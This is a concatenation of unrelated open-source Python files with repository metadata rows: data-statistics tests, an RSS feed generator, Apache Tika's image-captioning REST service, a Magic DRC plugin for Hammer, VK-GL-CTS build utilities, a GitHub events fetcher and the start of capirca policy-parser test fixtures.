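    # the smallest box covering the True region is [3:5, 6:14, :, 10:21],
    # i.e. 2 * 8 * 40 * 11 = 7040 elements; 2 * 8 * 40 * 6 = 3840 of them hold
    # the value 2, so the masked sum is 2 * 3840 = 7680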
# Now apply a view which includes just one slice that covers the original area
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 5)])
assert_allclose(result, 7680)
assert data.elements_accessed == 7040
# Make it so that the slice doesn't fully overlap with the subset
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 4)])
assert_allclose(result, 3840)
assert data.elements_accessed == 3520
# And now make it so there is no overlap
# TODO: should this result be 0 instead of nan?
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 3)])
assert_allclose(result, np.nan)
assert data.elements_accessed == 0
# Check what happens if we use an integer index that overlaps...
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[3])
assert_allclose(result, 3840)
assert data.elements_accessed == 3520
# ... and one that doesn't
# TODO: should this result be 0 instead of nan?
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[2])
assert_allclose(result, np.nan)
assert data.elements_accessed == 0
# Now try using a slice that has a step>1 - this should actually then
# bypass the efficient algorithm
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 5, 2)])
assert_allclose(result, 3840)
assert data.elements_accessed == 72000
# Finally we can do a complex mix of options
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=(slice(0, 5), slice(3, 10), 20, slice(None)))
assert_allclose(result, 96)
assert data.elements_accessed == 88
def test_compute_statistic_shape():
# The compute_statistic method has some code that helps it be more efficient
# with subsets, but we need to make sure that the final result has the same
# shape as if we didn't have those optimizations.
array = np.ones(10 * 20 * 30).reshape((10, 20, 30))
array[3:5, 6:14, 10:21] += 1
data = Data(x=array, y=array)
subset_state = data.id['y'] > 1.5
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state)
assert np.isscalar(result)
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
axis=1)
assert result.shape == (10, 30)
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
axis=(0, 2))
assert result.shape == (20,)
@pytest.mark.parametrize('view', ((slice(0, 5), slice(4, 14), slice(10, 22)),
(slice(0, 6), slice(4, 12), slice(0, 16)),
(slice(2, 5), slice(6, 12), slice(10, 20))))
def test_compute_statistic_shape_view(view):
# Test the compute_statistic method with the same optimizations and combined
# with different settings of the `view` parameter for sub-slicing the dataset.
array = np.ones((10, 20, 30))
array[3:5, 6:14, 10:21] += 1
data = Data(x=array, y=array)
state = data.id['y'] > 1.5
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view)
assert np.isscalar(result)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=1)
assert result.shape == (view[0].stop - view[0].start, view[2].stop - view[2].start)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=(0, 2))
assert result.shape == (view[1].stop - view[1].start,)
roi = RangeROI('x', min=1.5, max=2.0)
state = roi_to_subset_state(roi, x_att='x')
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view)
assert np.isscalar(result)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=1)
assert result.shape == (view[0].stop - view[0].start, view[2].stop - view[2].start)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=(0, 2))
assert result.shape == (view[1].stop - view[1].start,)
def test_compute_histogram_log():
# Make sure that the returned histogram is NaN everywhere if either of the
# limits are negative in log mode
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x']], range=[[0.5, 2.5]], bins=[2])
assert_allclose(result, [10, 0])
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x']], range=[[0.5, 2.5]], bins=[2], log=[True])
assert_allclose(result, [10, 0])
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x']], range=[[-0.5, 2.5]], bins=[2], log=[True])
assert result.shape == (2,) and np.sum(result) == 0
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x'], data.id['y']], range=[[-0.5, 3], [-3, 5]], bins=[2, 3], log=[True, True])
assert result.shape == (2, 3) and np.sum(result) == 0
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x'], data.id['y']], range=[[1, 3], [-3, 5]], bins=[2, 3], log=[True, True])
assert result.shape == (2, 3) and np.sum(result) == 0
def test_compute_histogram_dask():
# Make sure that compute_histogram works for dask arrays
da = pytest.importorskip('dask.array')
data = Data(x=da.arange(10))
result = data.compute_histogram([data.id['x']], range=[[-0.5, 11.75]], bins=[2])
assert_allclose(result, [6, 4])
result = data.compute_histogram([data.id['x']], range=[[-0.5, 11.25]], bins=[2], subset_state=data.id['x'] > 4.5)
assert_allclose(result, [1, 4])
def test_compute_histogram_dask_mixed():
# Make sure that compute_histogram works when mixing dask and non-dask arrays
da = pytest.importorskip('dask.array')
data = Data(x=da.arange(10), y=np.arange(10))
result = data.compute_histogram([data.id['y'], data.id['x']], range=[[-0.5, 11.75], [-0.5, 11.75]], bins=[2, 3])
assert_allclose(result, [[4, 2, 0], [0, 2, 2]])
result = data.compute_histogram([data.id['y'], data.id['x']], range=[[-0.5, 11.25], [-0.5, 11.25]], bins=[2, 3], subset_state=data.id['x'] > 4.5)
assert_allclose(result, [[0, 1, 0], [0, 2, 2]])
|
c9e9098fd50f2a7982d629874a4cd4f05531a92b
|
450b551bd5f5c99bcf175ebdd114ecfb55788f3e
|
/actions/rss.py
|
5b5ca43ebcc509e6a6da0a415f076970f162c054
|
[] |
no_license
|
LogicJake/MLCompetitionHub
|
2482f8ce3ac7eb9d46a5fc62fa92147405cb1561
|
ab5e68b5aa424b98bd9ea98cf094b35bd12bb49d
|
refs/heads/master
| 2023-09-03T17:54:33.843632
| 2023-09-03T08:01:13
| 2023-09-03T08:01:13
| 234,690,463
| 144
| 27
| null | 2023-05-22T22:38:21
| 2020-01-18T06:10:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,603
|
py
|
rss.py
|
import copy
from datetime import datetime, timedelta
from xml.sax.saxutils import escape
from jinja2 import Environment, PackageLoader
STANDARD_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S+08:00'
def generate(datas_):
datas = copy.deepcopy(datas_)
for data in datas:
for c in data['competitions']:
start_time = c['start_time']
deadline = c['deadline']
description = c['description']
reward = c['reward']
            # convert to standard-format time strings
if start_time is None:
                start_time = 'No specific time given'
else:
start_time = start_time.strftime(STANDARD_TIME_FORMAT)
if deadline is None:
                deadline = 'No specific time given'
else:
deadline = deadline.strftime(STANDARD_TIME_FORMAT)
content = '<h3>Description</h3>{}<h3>Deadline: {}</h3><h3>Reward: {}</h3>'.format(
escape(description), deadline, reward)
c['start_time'] = start_time
c['deadline'] = deadline
c['content'] = content
c['name'] = escape(c['name'])
c['description'] = escape(c['description'])
c['url'] = escape(c['url'])
update = datetime.utcnow() + timedelta(hours=8)
update = update.strftime(STANDARD_TIME_FORMAT)
    # generate the RSS feed
env = Environment(loader=PackageLoader('actions'))
template = env.get_template('rss.j2')
content = template.render(datas=datas, update=update)
with open('docs/rss.xml', 'w') as f:
f.write(content)
|
44407a1ec8d31f1c81dd3a96b91fe7fa904f74d1
|
6636854f8d55c1cb9dc8d55a9ba4e01d17c360f1
|
/tika-parsers/tika-parsers-ml/tika-parser-advancedmedia-module/src/main/resources/org/apache/tika/parser/captioning/tf/im2txtapi.py
|
97f1f2afd642da9589e3c4338e95d2f1a07cad83
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"LicenseRef-scancode-unknown",
"EPL-1.0",
"ICU",
"LicenseRef-scancode-bsd-simplified-darwin",
"MPL-2.0",
"LicenseRef-scancode-iptc-2006",
"LicenseRef-scancode-proprietary-license",
"MIT",
"NetCDF",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unrar",
"Classpath-exception-2.0",
"LGPL-2.1-or-later",
"CDDL-1.0",
"CDDL-1.1",
"GPL-2.0-only"
] |
permissive
|
apache/tika
|
ff4fe69a76a3c84f947223fe9b806045ee693f71
|
40910015849aba5a57e59ad0f3aeff803744f3ab
|
refs/heads/main
| 2023-08-31T11:19:31.578196
| 2023-08-31T06:12:10
| 2023-08-31T06:12:10
| 206,427
| 1,817
| 856
|
Apache-2.0
| 2023-09-14T19:27:42
| 2009-05-21T02:12:11
|
Java
|
UTF-8
|
Python
| false
| false
| 8,997
|
py
|
im2txtapi.py
|
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This script exposes image captioning service over a REST API. Image captioning implementation based on the paper,
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
For more details, please visit :
http://arxiv.org/abs/1411.4555
Requirements :
Flask
tensorflow
numpy
requests
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import math
import requests
import sys
from flask import Flask, request, Response, jsonify
from io import BytesIO
from PIL import Image
from time import time
import tensorflow as tf
import xml.etree.ElementTree as ET
import model_wrapper
import vocabulary
import caption_generator
# turning off the traceback by limiting its depth
sys.tracebacklimit = 0
# informative log messages for advanced users to troubleshoot errors when modifying model_info.xml
try:
info = ET.parse('/usr/share/apache-tika/models/dl/image/caption/model_info.xml').getroot()
except IOError:
logging.exception('model_info.xml is not found')
sys.exit(1)
model_main = info.find('model_main')
if model_main is None:
    logging.exception('<model_main> tag in model_info.xml is not found')
sys.exit(1)
checkpoint_path = model_main.find('checkpoint_path')
if checkpoint_path is None:
logging.exception('<checkpoint_path> tag under <model_main> tag in model_info.xml is not found')
sys.exit(1)
else:
checkpoint_path = checkpoint_path.text
vocab_file = model_main.find('vocab_file')
if vocab_file is None:
logging.exception('<vocab_file> tag under <model_main> tag in model_info.xml is not found')
sys.exit(1)
else:
vocab_file = vocab_file.text
port = info.get('port')
if port is None:
logging.exception('port attribute in <service> tag in model_info.xml is not found')
sys.exit(1)
# turning on the traceback by setting it to default
sys.tracebacklimit = 1000
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("checkpoint_path", checkpoint_path, """Directory containing the model checkpoint file.""")
tf.flags.DEFINE_string('vocab_file', vocab_file, """Text file containing the vocabulary.""")
tf.flags.DEFINE_integer('port', port, """Server PORT, default:8764""")
tf.logging.set_verbosity(tf.logging.INFO)
class Initializer(Flask):
"""
Class to initialize the REST API, this class loads the model from the given checkpoint path in model_info.xml
and prepares a caption_generator object
"""
def __init__(self, name):
super(Initializer, self).__init__(name)
# build the inference graph
g = tf.Graph()
with g.as_default():
model = model_wrapper.ModelWrapper()
restore_fn = model.build_graph(FLAGS.checkpoint_path)
g.finalize()
# make the model globally available
self.model = model
# create the vocabulary
self.vocab = vocabulary.Vocabulary(FLAGS.vocab_file)
self.sess = tf.Session(graph=g)
# load the model from checkpoint
restore_fn(self.sess)
def current_time():
"""Returns current time in milli seconds"""
return int(1000 * time())
app = Initializer(__name__)
def get_remote_file(url, success=200, timeout=10):
"""
Given HTTP URL, this api gets the content of it
returns (Content-Type, image_content)
"""
try:
app.logger.info("GET: %s" % url)
auth = None
res = requests.get(url, stream=True, timeout=timeout, auth=auth)
if res.status_code == success:
return res.headers.get('Content-Type', 'application/octet-stream'), res.raw.data
    except Exception:
pass
return None, None
@app.route("/")
def index():
"""The index page which provide information about other API end points"""
return """
<div>
<h1> Image Captioning REST API </h1>
<h3> The following API end points are valid </h3>
<ul>
<h4> Inception V3 </h4>
<li> <code>/inception/v3/ping </code> - <br/>
<b> Description : </b> checks availability of the service. returns "pong" with status 200 when it is available
</li>
<li> <code>/inception/v3/caption/image</code> - <br/>
<table>
<tr><th align="left"> Description </th><td> This is a service that can caption images</td></tr>
<tr><th align="left"> How to supply Image Content </th></tr>
<tr><th align="left"> With HTTP GET : </th> <td>
Include a query parameter <code>url </code> which is an http url of JPEG image <br/>
Example: <code> curl "localhost:8764/inception/v3/caption/image?url=http://xyz.com/example.jpg"</code>
</td></tr>
<tr><th align="left"> With HTTP POST :</th><td>
POST JPEG image content as binary data in request body. <br/>
Example: <code> curl -X POST "localhost:8764/inception/v3/caption/image" --data-binary @example.jpg </code>
</td></tr>
</table>
</li>
<ul>
</div>
"""
@app.route("/inception/v3/ping", methods=["GET"])
def ping_pong():
"""API to do health check. If this says status code 200, then healthy"""
return "pong"
@app.route("/inception/v3/caption/image", methods=["GET", "POST"])
def caption_image():
"""API to caption images"""
image_format = "not jpeg"
st = current_time()
# get beam_size
beam_size = int(request.args.get("beam_size", "3"))
# get max_caption_length
max_caption_length = int(request.args.get("max_caption_length", "20"))
# get image_data
if request.method == 'POST':
image_data = request.get_data()
else:
url = request.args.get("url")
c_type, image_data = get_remote_file(url)
if not image_data:
            return Response(status=400, response=json.dumps({"error": "Could not HTTP GET %s" % url}), mimetype="application/json")
if 'image/jpeg' in c_type:
image_format = "jpeg"
# use c_type to find whether image_format is jpeg or not
# if jpeg, don't convert
if image_format == "jpeg":
jpg_image = image_data
# if not jpeg
else:
# open the image from raw bytes
image = Image.open(BytesIO(image_data))
        # convert the image to RGB; saving as JPEG fails for non-RGB modes (e.g. RGBA, P)
rgb_image = image.convert("RGB")
# convert the RGB image to jpeg
image_bytes = BytesIO()
rgb_image.save(image_bytes, format="jpeg", quality=95)
jpg_image = image_bytes.getvalue()
image_bytes.close()
read_time = current_time() - st
# restart counter
st = current_time()
generator = caption_generator.CaptionGenerator(app.model,
app.vocab,
beam_size=beam_size,
max_caption_length=max_caption_length)
captions = generator.beam_search(app.sess, jpg_image)
captioning_time = current_time() - st
app.logger.info("Captioning time : %d" % captioning_time)
array_captions = []
for caption in captions:
sentence = [app.vocab.id_to_word(w) for w in caption.sentence[1:-1]]
sentence = " ".join(sentence)
array_captions.append({
'sentence': sentence,
'confidence': math.exp(caption.logprob)
})
response = {
'beam_size': beam_size,
'max_caption_length': max_caption_length,
'captions': array_captions,
'time': {
'read': read_time,
'captioning': captioning_time,
'units': 'ms'
}
}
return Response(response=json.dumps(response), status=200, mimetype="application/json")
def main(_):
if not app.debug:
print("Serving on port %d" % FLAGS.port)
app.run(host="0.0.0.0", port=FLAGS.port)
if __name__ == '__main__':
tf.app.run()
|
5cf6818f1942ab534fccdcc184ebed86e393ebd8
|
23d9ddbcb43715b44402961a7131b574624b23f8
|
/hammer/drc/magic/__init__.py
|
c14b5ca0935c07e6732220aedad3b96a00f3e366
|
[
"BSD-3-Clause"
] |
permissive
|
ucb-bar/hammer
|
d80b96c9d402d8a5c0b780c65de86597d93b4190
|
46b4e7525d8050904ad71786c57a2593976592a2
|
refs/heads/master
| 2023-06-25T15:51:37.728475
| 2023-06-15T16:15:33
| 2023-06-15T16:15:33
| 63,273,685
| 196
| 48
|
BSD-3-Clause
| 2023-09-08T05:09:48
| 2016-07-13T19:26:51
|
Python
|
UTF-8
|
Python
| false
| false
| 6,551
|
py
|
__init__.py
|
# Magic DRC plugin for Hammer
#
# See LICENSE for licence details.
import os
from textwrap import dedent as dd
from typing import List, Optional, Dict, Any
from hammer.logging import HammerVLSILogging
from hammer.utils import deepdict
from hammer.vlsi import HammerToolStep
from hammer.vlsi import HammerDRCTool, TCLTool
class Magic(HammerDRCTool, TCLTool):
#=========================================================================
# overrides from parent classes
#=========================================================================
@property
def steps(self) -> List[HammerToolStep]:
return self.make_steps_from_methods([
self.init_design,
self.run_drc
])
def do_post_steps(self) -> bool:
assert super().do_post_steps()
return self.run_magic()
@property
def env_vars(self) -> Dict[str, str]:
new_dict = deepdict(super().env_vars)
return new_dict
def fill_outputs(self) -> bool:
return True
def tool_config_prefix(self) -> str:
return "drc.magic"
def drc_results_pre_waived(self) -> Dict[str, int]:
return {}
def globally_waived_drc_rules(self) -> List[str]:
return []
def version_number(self, version:str) -> int:
"""Get version from magic bin"""
version = self.run_executable([self.get_setting("drc.magic.magic_bin"), "--version"])
return int(version.replace(".", ""))
@property
def generated_scripts_dir(self) -> str:
return os.path.join(self.run_dir, "generated-scripts")
@property
def view_drc_script(self) -> str:
return os.path.join(self.generated_scripts_dir, "view_drc")
@property
def view_drc_tcl(self) -> str:
return os.path.join(self.generated_scripts_dir, "view_drc.tcl")
#=========================================================================
# useful subroutines
#=========================================================================
def run_magic(self) -> bool:
self.append("quit")
run_script = os.path.join(self.run_dir, "drc.tcl")
with open(run_script, "w") as f:
f.write("\n".join(self.output))
args = [self.get_setting("drc.magic.magic_bin")]
rcfile = self.get_setting("drc.magic.rcfile")
techfile = self.get_drc_decks()
if rcfile is not None:
args.extend(["-rcfile", rcfile])
else:
            # The DRC deck should be the tech file. There should be exactly 1.
            if len(techfile) == 0 or len(techfile) > 1:
                self.logger.error("None or more than 1 tech file (DRC deck) found. magic only supports 1.")
args.extend(["-T", techfile[0]])
"""
        Create the view_drc script. This opens an interactive window but has to run DRC
        all over again because there is no DRC database that can be loaded back in.
"""
os.makedirs(self.generated_scripts_dir, exist_ok=True)
with open(self.view_drc_script, "w") as f:
f.write(dd("""
cd {run_dir}
{args} {gds} {run_script}
""".format(
run_dir = self.run_dir,
args = " ".join(args),
gds = self.layout_file,
run_script = self.view_drc_tcl
)).strip())
os.chmod(self.view_drc_script, 0o755)
with open(self.view_drc_tcl, "w") as f:
f.write(dd("""
gds read {gds}
load {top}
select top cell
drc check
""".format(gds = self.layout_file, top = self.top_module)).strip())
# Finally append the no GUI options and full Tcl run script
args.extend(["-noconsole", "-dnull", run_script])
if bool(self.get_setting("drc.magic.generate_only")):
self.logger.info("Generate-only mode: command-line is " + \
" ".join(args))
else:
# Temporarily disable colors/tag to make run output more readable
# TODO: think of a more elegant way to do this?
HammerVLSILogging.enable_colour = False
HammerVLSILogging.enable_tag = False
self.run_executable(args, cwd=self.run_dir) # TODO: check for errors
HammerVLSILogging.enable_colour = True
HammerVLSILogging.enable_tag = True
return True
#========================================================================
# drc main steps
#========================================================================
def init_design(self) -> bool:
"""Read design and set up results outputs"""
self.append("gds read " + self.layout_file)
self.append("load " + self.top_module)
self.append("select top cell")
self.append("set oscale [cif scale out]")
# Results output is taken from output of certain commands
# Hooks that also write to it should use the $fout variable
self.append("set fout [open drc.out w]")
self.append(self.get_additional_drc_text())
return True
def run_drc(self) -> bool:
"""Run DRC and dump error boxes"""
self.append('puts "Running DRC..."')
self.append("drc check")
self.append("set flat_count 0")
# Adapted from OpenLane
self.append('puts $fout "----------------------------------------"')
self.append("set drcresult [drc listall why]")
self.append('''
foreach {errtype coordlist} $drcresult {
puts $fout $errtype
puts $fout "----------------------------------------"
foreach coord $coordlist {
set bllx [expr {$oscale * [lindex $coord 0]}]
set blly [expr {$oscale * [lindex $coord 1]}]
set burx [expr {$oscale * [lindex $coord 2]}]
set bury [expr {$oscale * [lindex $coord 3]}]
set coords [format " %.3fum %.3fum %.3fum %.3fum" $bllx $blly $burx $bury]
puts $fout "$coords"
incr flat_count
}
puts $fout "----------------------------------------"
}
puts $fout ""
close $fout
''')
# Error counts
# TODO: hierarchical counts don't work in noconsole mode...
#self.append('puts "Hierarchical DRC error counts:"')
#self.append("puts [drc listall count]")
self.append('puts "Flat DRC error count: $flat_count"')
return True
tool = Magic
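# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the plugin above: parsing the drc.out
# report that run_drc() emits. The layout is taken from the Tcl generated
# above (40-dash separators, an error-type line, then one indented
# " <llx>um <lly>um <urx>um <ury>um" bounding box per violation). Assumes
# error descriptions never begin with a space.
def parse_drc_report(path: str = "drc.out") -> Dict[str, Any]:
    """Return {error_type: [(llx, lly, urx, ury), ...]} from a magic drc.out."""
    results = {} # type: Dict[str, Any]
    current = None
    with open(path) as f:
        for raw in f:
            line = raw.rstrip("\n")
            if not line or set(line) == {"-"}:
                continue # skip blank lines and dashed separators
            if line.startswith(" ") and line.strip().endswith("um"):
                # coordinate line, e.g. " 1.234um 5.678um 9.012um 3.456um"
                box = tuple(float(tok[:-2]) for tok in line.split())
                results.setdefault(current, []).append(box)
            else:
                current = line.strip() # error-type heading
    return results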
|
1f7428c212b6932cabaa6e7c501eec8cc57d0403
|
cc91a1c30f6c5a176b225bdbf96c7bfd6dfeca52
|
/scripts/ctsbuild/common.py
|
2ad5c74a35bcbffdd66b1cb6b3a93b1f7a595aa1
|
[
"Apache-2.0"
] |
permissive
|
KhronosGroup/VK-GL-CTS
|
d07b2611dc3a258b5be4ff87c1fe55623f32bac1
|
a745d5c29c5609cb7805f59444520a7700cf39d1
|
refs/heads/main
| 2023-08-31T19:34:48.447202
| 2023-08-25T13:17:54
| 2023-08-25T13:17:54
| 50,466,830
| 454
| 267
|
Apache-2.0
| 2023-09-02T20:49:14
| 2016-01-26T23:29:28
|
C++
|
UTF-8
|
Python
| false
| false
| 3,310
|
py
|
common.py
|
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
import os
import sys
import shlex
import platform
import subprocess
DEQP_DIR = os.path.realpath(os.path.normpath(os.path.join(os.path.dirname(__file__), "..", "..")))
# HostInfo describes properties of the host where these scripts
# are running on.
class HostInfo:
OS_WINDOWS = 0
OS_LINUX = 1
OS_OSX = 2
@staticmethod
def getOs ():
if sys.platform == 'darwin':
return HostInfo.OS_OSX
elif sys.platform == 'win32':
return HostInfo.OS_WINDOWS
elif sys.platform.startswith('linux'):
return HostInfo.OS_LINUX
else:
raise Exception("Unknown sys.platform '%s'" % sys.platform)
@staticmethod
def getArchBits ():
MACHINE_BITS = {
"i386": 32,
"i686": 32,
"x86": 32,
"x86_64": 64,
"AMD64": 64
}
machine = platform.machine()
if not machine in MACHINE_BITS:
raise Exception("Unknown platform.machine() '%s'" % machine)
return MACHINE_BITS[machine]
def die (msg):
print(msg)
exit(-1)
def shellquote(s):
    # Escape backslash, double quote, dollar and backtick, then wrap in double quotes.
    return '"%s"' % s.replace('\\', '\\\\').replace('"', '\\"').replace('$', '\\$').replace('`', '\\`')
g_workDirStack = []
def pushWorkingDir (path):
oldDir = os.getcwd()
os.chdir(path)
g_workDirStack.append(oldDir)
def popWorkingDir ():
assert len(g_workDirStack) > 0
newDir = g_workDirStack[-1]
g_workDirStack.pop()
os.chdir(newDir)
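# Illustrative sketch, not in the original module: a context-manager wrapper
# over the push/pop helpers above so callers cannot forget the matching
# popWorkingDir(); the contextlib import is only needed for this sketch.
from contextlib import contextmanager

@contextmanager
def workingDir (path):
    pushWorkingDir(path)
    try:
        yield
    finally:
        popWorkingDir()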
def execute (args):
retcode = subprocess.call(args)
if retcode != 0:
raise Exception("Failed to execute '%s', got %d" % (str(args), retcode))
def readBinaryFile (filename):
f = open(filename, 'rb')
data = f.read()
f.close()
return data
def readFile (filename):
f = open(filename, 'rt')
data = f.read()
f.close()
return data
def writeBinaryFile (filename, data):
f = open(filename, 'wb')
f.write(data)
f.close()
def writeFile (filename, data):
if (sys.version_info < (3, 0)):
f = open(filename, 'wt')
else:
f = open(filename, 'wt', newline='\n')
f.write(data)
f.close()
def which (binName, paths = None):
    if paths is None:
paths = os.environ['PATH'].split(os.pathsep)
def whichImpl (binWithExt):
for path in paths:
path = path.strip('"')
fullPath = os.path.join(path, binWithExt)
if os.path.isfile(fullPath) and os.access(fullPath, os.X_OK):
return fullPath
return None
extensions = [""]
if HostInfo.getOs() == HostInfo.OS_WINDOWS:
extensions += [".exe", ".bat"]
for extension in extensions:
extResult = whichImpl(binName + extension)
        if extResult is not None:
return extResult
return None
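# Illustrative usage sketch, not part of the original module; the file name
# and binary name below are placeholders.
if __name__ == "__main__":
    pushWorkingDir("/tmp")
    writeFile("deqp-example.txt", "hello\n")
    print(readFile("deqp-example.txt"))
    popWorkingDir()
    print("python3 found at: %s" % which("python3"))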
|
1d20bad6ea3cdfbcaa6d7ef908b9d1e10e711320
|
1fbe9c5ff4f12a98e8dc0f213ab75c6c15526797
|
/baymax/libs/github.py
|
86cd864f19fd22f8a5bbe7ec53eedd2eac259a13
|
[] |
no_license
|
no13bus/baymax
|
347db6e3ace2e8ac862f3660f736e7eb94fb0568
|
5fa88b5da21542bfacb3013bc1de1c6b9a9edab2
|
refs/heads/master
| 2023-09-04T14:47:49.506596
| 2022-06-13T08:32:15
| 2022-06-13T08:32:15
| 27,410,003
| 401
| 68
| null | 2015-05-22T02:51:30
| 2014-12-02T01:55:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,839
|
py
|
github.py
|
# coding: utf-8
import requests
import json
import datetime
from itertools import groupby
API_URL = 'https://api.github.com'
class GitHub(object):
def __init__(self, token, username):
self.token = token
self.username = username
def get_datas(self):
url = '%s/users/%s/events?page=1&per_page=100&access_token=%s' % (API_URL, self.username, self.token)
r = requests.get(url)
j = json.loads(r.content)
def group_key(s):
time_str = datetime.datetime.strptime(s['created_at'], '%Y-%m-%dT%H:%M:%SZ').strftime('%Y-%m-%d')
return time_str
now = datetime.datetime.now().strftime('%Y-%m-%d')
j = [i for i in j if i['type'] == 'PushEvent' and datetime.datetime.strptime(i['created_at'], '%Y-%m-%dT%H:%M:%SZ').strftime('%Y-%m-%d') < now]
res = []
for key,valuesiter in groupby(j, key=group_key):
res.append((key, len(list(valuesiter))))
return res
    # start_day (e.g. 2015-05-01): the most recent date already stored in the database
def get_data(self, start_day):
now_time_str = datetime.datetime.now().strftime('%Y-%m-%d')
url = '%s/users/%s/events?page=1&per_page=100&access_token=%s' % (API_URL, self.username, self.token)
r = requests.get(url)
j = json.loads(r.content)
def group_key(s):
time_str = datetime.datetime.strptime(s['created_at'], '%Y-%m-%dT%H:%M:%SZ').strftime('%Y-%m-%d')
return time_str
j = [i for i in j if i['type'] == 'PushEvent' and i['created_at'].split('T')[0] < now_time_str]
res = []
for key,valuesiter in groupby(j, key=group_key):
if start_day < key:
res.append((key, len(list(valuesiter))))
else:
break
return res
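# Illustrative usage sketch, not part of the original module; TOKEN and
# USERNAME are placeholders. Note that ?access_token= query-parameter
# authentication (used above) has since been deprecated by GitHub in favour
# of an Authorization header, so live calls may be rejected.
if __name__ == '__main__':
    gh = GitHub('TOKEN', 'USERNAME')
    # daily PushEvent counts newer than the given date
    for day, count in gh.get_data('2015-05-01'):
        print(day, count)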
|
7f8ff177a2acf6b2edb46d514a57516ca09d7a77
|
fcab2679a5c5030c54bbee10857a64263e8d7b46
|
/tests/lib/policy_test.py
|
d550d5d496487fe407eb14ab2db7a8de69200285
|
[
"Apache-2.0"
] |
permissive
|
google/capirca
|
38eb9339e565b30667d264e18e9b81ee0ac41d18
|
d145ca447e0e04895507777b8c5834c22e90df11
|
refs/heads/master
| 2023-08-28T02:37:19.814474
| 2023-08-23T13:59:33
| 2023-08-23T13:59:33
| 40,198,544
| 743
| 238
|
Apache-2.0
| 2023-09-11T20:02:40
| 2015-08-04T17:25:11
|
Python
|
UTF-8
|
Python
| false
| false
| 56,858
|
py
|
policy_test.py
|
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for policy.py library."""
from absl.testing import absltest
from unittest import mock
from absl import logging
from capirca.lib import nacaddr
from capirca.lib import naming
from capirca.lib import policy
HEADER = """
header {
comment:: "this is a test acl"
comment:: "this is another comment"
target:: juniper test-filter
}
"""
HEADER_2 = """
header {
comment:: "this goes in the other direction"
target:: juniper test-filter-outbound
}
"""
HEADER_3 = """
header {
comment:: "test header 3"
target:: cisco 50 standard
}
"""
HEADER_4 = """
header {
comment:: "test header 4"
target:: iptables
}
"""
HEADER_5 = """
header {
comment:: "test header 5"
target:: gce global/networks/default
}
"""
HEADER_6 = """
header {
comment:: "this is a test nftable acl"
target:: nftables chain_name input 0 inet
}
"""
HEADER_V6 = """
header {
comment:: "this is a test inet6 acl"
comment:: "this is another comment"
target:: juniper test-filter inet6
}
"""
HEADER_SRX = """
header {
target:: srx from-zone foo to-zone bar
}
"""
HEADER_OBJ_GRP = """
header {
target:: cisco foo object-group
}
"""
HEADER_ADDRBOOK_MIXED = """
header {
target:: srx from-zone to-zone bar
target:: cisco foo
}
"""
HEADER_HF_1 = """
header {
comment:: "This is a test of HF INGRESS Policy."
target:: gcp_hf INGRESS
}
"""
INCLUDE_STATEMENT = """
#include "includes/y.inc"
"""
INCLUDED_Y_FILE = """
term included-term-1 {
protocol:: tcp
action:: accept
}
#include "includes/z.inc"
"""
BAD_INCLUDED_FILE = """
term included-term-1 {
protocol:: tcp
action:: accept
}
#include "/tmp/z.inc"
"""
